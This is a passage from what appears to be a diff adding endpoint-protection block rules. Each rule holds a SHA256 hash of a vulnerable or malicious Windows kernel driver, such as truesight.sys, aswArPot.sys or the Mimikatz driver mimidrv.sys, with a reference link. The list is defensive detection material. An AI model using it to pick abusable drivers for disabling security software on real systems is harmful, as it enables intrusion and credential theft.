+ "value": "06aabaeb78213f66d119a699db7602d841ae7f6b9ec9100b1a534abe5709e516",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf5544fd-e310-5d14-b670-5d450cc451cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498036Z",
+ "creation_date": "2026-03-23T11:45:31.498039Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498047Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94131b5c56a10bc562b15eb3966c4481b165737118a6e1102e67ff291308cf38",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf633852-1fbf-5ed3-9844-6e462ea345eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452542Z",
+ "creation_date": "2026-03-23T11:45:30.452545Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452553Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c1b21978c6aef881f056f7b9c909b56488019459ed256511d78a4588d1aa7a4",
+ "comment": "Vulnerable Kernel Driver (aka skill.sys) [https://www.loldrivers.io/drivers/724d7989-dfce-4bb2-9beb-dee15df5b790/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf653a27-05dc-58e7-859a-7fa059ada47f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145342Z",
+ "creation_date": "2026-03-23T11:45:31.145344Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145350Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15f91017e60f244aff3a7449dcb0e1480bc14e91e1a4f118a98e6610c2c962e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf6561a1-5268-5c4b-a666-952c1b028212",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468799Z",
+ "creation_date": "2026-03-23T11:45:30.468802Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468810Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "612aa28d12aefd2af8565d4df6df9caa61b5fe8370fffb08933c03d558789e37",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf66bd11-8baa-5d17-a944-8792c1addf22",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979829Z",
+ "creation_date": "2026-03-23T11:45:29.979831Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979836Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7bc7306cb489fe4c285bbeddc6d1a09e814ef55cf30bd5b8daf87a52396f102",
+ "comment": "Vulnerable Kernel Driver (aka nt4.sys) [https://www.loldrivers.io/drivers/1d4f7a3a-786b-4a74-b34f-14d44343de9e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf6a53c0-d91c-57dc-9dfa-3ced6a9757ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497578Z",
+ "creation_date": "2026-03-23T11:45:31.497580Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497586Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62593294a57baf97ad7d8982aa250db537da892593d773515722e70e6784947b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf6fe948-eec2-5996-939a-58b94289fa11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457158Z",
+ "creation_date": "2026-03-23T11:45:30.457161Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457170Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14e6f0d5f93dc52471af549de1c91c1fc1d9dbd175d5932c17e58e6b186694c9",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf72ddce-1688-58ed-9801-84eaa892dd87",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818789Z",
+ "creation_date": "2026-03-23T11:45:30.818792Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56135fb8d5d3ed93b38679cb0dea9cc16ed7fdb0db9659e40a5c2d82655ada67",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf8df38b-9ccd-5795-ab73-4daaa8189c56",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972755Z",
+ "creation_date": "2026-03-23T11:45:29.972757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972762Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac42c7b1d9feccd48c305698942186d580b7bfd047bb73dbf028f3fed7aa24ad",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf8f8d4a-c6d9-57a3-8e85-99113b42dc1a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984441Z",
+ "creation_date": "2026-03-23T11:45:29.984443Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984448Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2c531a771b0df1585518a22427798e86611e6be3d357024797871a1b3876e9c",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf99055d-19ab-5f41-a9b6-92daaba1144d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482590Z",
+ "creation_date": "2026-03-23T11:45:31.482594Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482603Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d8627fccac3c1c6ad9926a28fdafd207bfd5022e8e927a7004928fb06b34b2c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf9db006-a4e9-56e5-bf08-ab11b6c06eb9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452050Z",
+ "creation_date": "2026-03-23T11:45:30.452069Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452090Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "235ab6981b521a424026926ad7f5d19a188e17491933e76269ad9a17a79ccc24",
+ "comment": "Vulnerable Kernel Driver (aka VBoxUSBMon.sys) [https://www.loldrivers.io/drivers/babe348d-f160-41ec-9db9-2413b989c1f0/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cfb00a78-ae16-5cff-8e35-f551658c2d42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148503Z",
+ "creation_date": "2026-03-23T11:45:31.148504Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148510Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f76ca1c2916e039a9e9bf78005cdb54be966e01c2434022e866d419b2b0aca80",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cfcaf0fe-f7bb-5a67-8d07-f62b9fb4921a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618734Z",
+ "creation_date": "2026-03-23T11:45:29.618737Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618746Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "057e6a58e3515e56eab85ccb8ec5086552b7de98c886c37f6a5284c002615565",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cfce64ea-e15c-5eb3-b2bc-013fdae358f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469262Z",
+ "creation_date": "2026-03-23T11:45:30.469265Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469275Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3bafb4e11a3823b3455728e938c69103dd4ff414529d9579b38b5ee12f77bce0",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cfda00f0-44ea-59f4-9f4c-cb16e21acf28",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147695Z",
+ "creation_date": "2026-03-23T11:45:31.147698Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147706Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b6c4dd4cd8cd166a25ed08508864d26fdc309b84009c1431e3e44c6c733b5cbf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cfe2b979-e437-5182-92a4-3b9c2bed0182",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823417Z",
+ "creation_date": "2026-03-23T11:45:31.823420Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823430Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e3955aed83f0e304c0efbf18026eed1d85245cc2054cabf262df1e9654a8fdd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cfe67115-ca9b-5cf5-9ceb-5d06f894293c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455501Z",
+ "creation_date": "2026-03-23T11:45:30.455504Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455512Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff1ccef7374a1a5054a6f4437e3e0504b14ed76e17090cc6b1a4ec0e2da427a5",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d002d5bf-40ab-515b-b162-6c432b415b58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490367Z",
+ "creation_date": "2026-03-23T11:45:31.490369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490374Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "27ae83e882c81045a7beaae03d886616e34e7501833f7f9e72297496d353bc39",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0058350-395f-5d47-b7fc-0ef3c7b85594",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835055Z",
+ "creation_date": "2026-03-23T11:45:30.835058Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835068Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b18bd2b50c20ec6604521c8124fd68b6993cbfd0cdfd1c6447aa8dbe99770baa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d00b46e4-94e0-51a8-8697-37fcb387dc30",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973305Z",
+ "creation_date": "2026-03-23T11:45:29.973307Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973312Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c0b429e5935814457934fa9c10ac7a88e19068fa1bd152879e4e9b89c103921",
+ "comment": "Voicemod Sociedad Limitada vulnerable driver (aka vmdrv.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d013a2d2-b8e9-587c-a65e-0bd171642813",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823917Z",
+ "creation_date": "2026-03-23T11:45:30.823920Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823926Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f7a53a1bcf34c5ab990eafcb598ec7df3089388a1dbe085e4b190c0b82a6ec99",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0175763-87dd-5c01-abbb-71b86d9481f6",
